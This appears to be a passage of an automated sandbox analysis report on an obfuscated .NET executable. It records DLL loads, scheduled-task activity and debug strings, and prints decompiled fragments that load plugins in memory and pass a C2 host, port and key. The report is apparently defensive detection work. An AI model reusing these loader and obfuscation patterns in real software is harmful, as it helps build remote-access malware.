Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: 9758xBqgE1azKnB.lnk.7.dr | LNK file: ..\..\..\..\..\9758xBqgE1azKnB.exe
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: 9758xBqgE1azKnB.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 9758xBqgE1azKnB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: 9758xBqgE1azKnB.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Windows\NHwE.pdbpdbHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Windows.Forms.pdbH source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.pdbAccessibility.dll8 source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdbu source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Configuration.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: o.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdbSHA256T source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdbj~ source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: %%.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb% source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000156C000.00000004.00000020.00020000.00000000.sdmp, WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdb source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000152A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Drawing.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr

              Data Obfuscation

              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.cs | .Net Code: MTLR62MwZG System.Reflection.Assembly.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs | .Net Code: Memory
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs | .Net Code: Memory
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.cs | .Net Code: MTLR62MwZG System.Reflection.Assembly.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs | .Net Code: Memory
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs | .Net Code: Memory
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Code function: 8_2_0820B913 push eax; retf 8_2_0820B91D
              Source: 9758xBqgE1azKnB.exe | Static PE information: section name: .text entropy: 7.9146348506405895
              Source: grjujyNaBLaKbU.exe.0.dr | Static PE information: section name: .text entropy: 7.9146348506405895
              Source: 9758xBqgE1azKnB.exe.7.dr | Static PE information: section name: .text entropy: 7.9146348506405895
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, lMrCMlzm8JgcqZan6j.cs | High entropy of concatenated method names: 'cA5oKnDeou', 'PWooPwXbF5', 'dpEolbbYJD', 'eLBoxlVPbE', 'BbIoYe9T5H', 'eWKopNAMS7', 'ft4o9T9e53', 'CeYohkSvPY', 'rPgoCNIZ9N', 'OoGoSdCcI7'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, tP4sQN4ycAfk4RTrPD.cs | High entropy of concatenated method names: 'ptb625Gys', 'msnI2FQDZ', 'xFPKxJB28', 'CJq8FeOMM', 'DRNlYykf4', 'MFsAxwA8F', 'VHwMsZn5qaRXoBVEAV', 'QUFS8Ijmg4nd478XUT', 'gxVsjeR3b', 'CWIomyXBC'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, EukKZG7BIlra3Zvh4J.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Tfb4fAm9st', 'fPH4HUvKcM', 'vt94zanV1I', 'p0KwLhOU8h', 'AWPwMyQ1hF', 'L4uw4rOZVE', 'jorwwc8JUv', 'EFC9ymNLxT8fLITSHdI'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, bdaIPTyqCvhKkGvBZ0.cs | High entropy of concatenated method names: 'JVZtbeyfo8', 'fLHteXo97w', 'CkCttC4os1', 'L0etj9c8VZ', 'EogtGiHXPO', 'vijthM8355', 'Dispose', 'kLXsm2ZIfW', 'JrlsNQWJaE', 'j7ls7ZXlOp'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, B2X6TIA6OwcjisGogX.cs | High entropy of concatenated method names: 'k2QqdjfgZ5', 'eLeq8Ftpnh', 'Jw97ikoIAC', 'i987pfwYMZ', 'vxu79ThvK9', 'bMJ7cynblv', 'K9d7OmOdpm', 'dmP73StVmr', 'XQc7g9wnpc', 'cIn7T1XoCF'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, JPU6JeZEfcOAh3VAxw.cs | High entropy of concatenated method names: 'FMgbTXjbCK', 'uqZb1Vs1nh', 'SuDbZAuWsr', 'cfrbWkUplv', 'crYbYVOVeH', 'PdCbi5XQT8', 'qiEbpGCZsq', 'Etyb9QT1qs', 'XwNbc3fkbI', 'z89bOi6iXU'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, BfRKGsxfmapLDnyJae.cs | High entropy of concatenated method names: 'MbSrafQdhs', 'WNYrNlajD9', 'JMUrqANN1W', 'OF1rkrPrwn', 'cGBrBHtKk2', 'CoYq58XgrI', 'aAnqEuqaSf', 'YQHqy03gBN', 'oC6qJSqequ', 'grPqfIOBvQ'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.cs | High entropy of concatenated method names: 'KqpwaCvyRb', 'GdUwmRTqhL', 'sPIwNeNjTg', 'e7Zw75gqvZ', 'fONwq8WGVq', 'XRRwraVqAf', 'uILwk3RPMY', 'c0qwBpt8qH', 'cMewQjfnRs', 'jTvwvXj1jG'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, G0rrHkR3Regm38HbYK.cs | High entropy of concatenated method names: 'hmRMkWu4X2', 'LSeMBE0Pxk', 'wAuMv3ak4X', 'UHnMu3d2X6', 'rGoMbgXKfR', 'BGsMnfmapL', 'RM4Zsa9v91jxrp3tyN', 'hy62Gm5BFHIFjtfOWS', 'DUNMMAYQlq', 'UXKMwmR6U4'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, etnqG0M40RuYQ2CGjgs.cs | High entropy of concatenated method names: 'ToString', 'pYyjPN0WPl', 'Fn4jl9uRBK', 'H9njAaFHsF', 'ir7jx6YOxy', 'tPkjYgC6i8', 'LgXjiJGs3G', 'oPYjpUIa4S', 'X1FpvL0waeBwGC0jlB7', 'H9FsVx0GUf3cpEH2BN3'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, X0CI17Nm2rK9soP4pW.cs | High entropy of concatenated method names: 'Dispose', 'lhKMfkGvBZ', 'wLZ4Yb88y8', 'c4VIJQdyrP', 'PTSMHyJ0i3', 'L9GMzXgcPq', 'ProcessDialogKey', 'lKv4L5r4yM', 'YRg4MaMpV6', 'c2a44F6kQq'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, IrSCmVMMhSAxy1sNwDY.cs | High entropy of concatenated method names: 'XxkoHW3QiY', 'U83ozFLryS', 'bFmjLKjL4X', 'kyBjMBjEty', 'DK9j4WDA5V', 'U4HjwOMsdE', 'itFjRC0vK1', 'GtEjaYOSkx', 'eQAjm6S772', 'NOtjNL9pKk'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, dWu4X2POSeE0PxkDow.cs | High entropy of concatenated method names: 'oD7NZBVV0S', 'AIWNWaldgO', 'qxkNFG9puw', 'fKgNDwWWJe', 'GLnN53mHdT', 'bW3NEP3ZyU', 'Q5tNyyPOWv', 'bpkNJAOnHj', 'LkxNfk38fL', 'BplNHAFPNF'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, S6kQq8H2YIZ3L9W7Iu.cs | High entropy of concatenated method names: 'tMho7YfbJ6', 'r6Goq8Adjx', 'nHZornjoec', 'pH3okUIbbd', 'rENot4OdO8', 'rHmoBKKgIR', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, A0S6FhlAu3ak4X5Hn3.cs | High entropy of concatenated method names: 'htt7IrJ3mw', 'B4s7K7lYDA', 'GOZ7PChdSj', 'Pdd7lCHrkH', 'udF7bJwLu9', 'sKk7nvupqW', 'pPJ7ecpFw1', 't1B7sOKSjM', 'r8P7t6D93Y', 'jGN7oi2djJ'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, DxVbSFEWu8YfBsCZIJ.cs | High entropy of concatenated method names: 'zoreJ9PuIV', 'rmweHajdJ2', 'icvsL2Ur4Q', 'JPbsM7QQEW', 'zUpeUjA7hS', 'Fahe1RdUB1', 'Ulue0lKtKh', 'TTseZXqNkm', 'AN0eW4FqNq', 'KM8eFJjY8k'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, l5r4yMfHRgaMpV6w2a.cs | High entropy of concatenated method names: 'VEdtxa5GFe', 'NuytYIbGuT', 'aXQtiuMxof', 'apntp4Rte9', 'UPvt9U26ia', 'XLqtciOh64', 'XnstOf9FPd', 'gKnt3hCetx', 'ii7tgosKho', 'znPtTuWFgo'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, cgS87n0bF9R7j9LBfg.cs | High entropy of concatenated method names: 'SkhVPu7f6k', 'g2iVlqVO2N', 'f4QVxFNQtO', 'UjdVYeXU67', 'WcEVp5uVer', 'xxxV9H1SA7', 'M7xVOJhJWj', 'bfMV3jTF4e', 'RsdVTId25Q', 'KW6VUWDu6S'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, RNpgfFMRE75cxe1a9ye.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8G2tr4KtS', 'AcX2oKYvAT', 'qnm2jRyMOv', 'oXH22sGkqe', 'IVd2GdxjUM', 'OwZ2Xax3wU', 'dpf2hbA0kp'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, KhXskcgjJb7WhBNB0e.cs | High entropy of concatenated method names: 'yWEkCYqyrk', 'RUokS7Qv7W', 'XCIk6se4hQ', 'vSZkIi8q9t', 'ef6kd1LsIb', 'UcPkKiZpLo', 'O67k8UvCQR', 'NlGkPfLSnO', 'pG6klcfFWj', 'aTPkAeRCHR'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, Ai0pUZOnQWs6p8kWrU.cs | High entropy of concatenated method names: 'lXKkmhsAiC', 'xQvk7l1Ah7', 'uFvkrNBmvv', 'b60rH8fCuL', 'VcQrzARj3C', 'HRskLtRtXG', 'H3GkMXNjkK', 'kUEk41gDxi', 'F0dkwcEmO6', 'rZNkRhq6NB'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, lMrCMlzm8JgcqZan6j.cs | High entropy of concatenated method names: 'cA5oKnDeou', 'PWooPwXbF5', 'dpEolbbYJD', 'eLBoxlVPbE', 'BbIoYe9T5H', 'eWKopNAMS7', 'ft4o9T9e53', 'CeYohkSvPY', 'rPgoCNIZ9N', 'OoGoSdCcI7'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, tP4sQN4ycAfk4RTrPD.cs | High entropy of concatenated method names: 'ptb625Gys', 'msnI2FQDZ', 'xFPKxJB28', 'CJq8FeOMM', 'DRNlYykf4', 'MFsAxwA8F', 'VHwMsZn5qaRXoBVEAV', 'QUFS8Ijmg4nd478XUT', 'gxVsjeR3b', 'CWIomyXBC'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, EukKZG7BIlra3Zvh4J.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Tfb4fAm9st', 'fPH4HUvKcM', 'vt94zanV1I', 'p0KwLhOU8h', 'AWPwMyQ1hF', 'L4uw4rOZVE', 'jorwwc8JUv', 'EFC9ymNLxT8fLITSHdI'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, bdaIPTyqCvhKkGvBZ0.cs | High entropy of concatenated method names: 'JVZtbeyfo8', 'fLHteXo97w', 'CkCttC4os1', 'L0etj9c8VZ', 'EogtGiHXPO', 'vijthM8355', 'Dispose', 'kLXsm2ZIfW', 'JrlsNQWJaE', 'j7ls7ZXlOp'
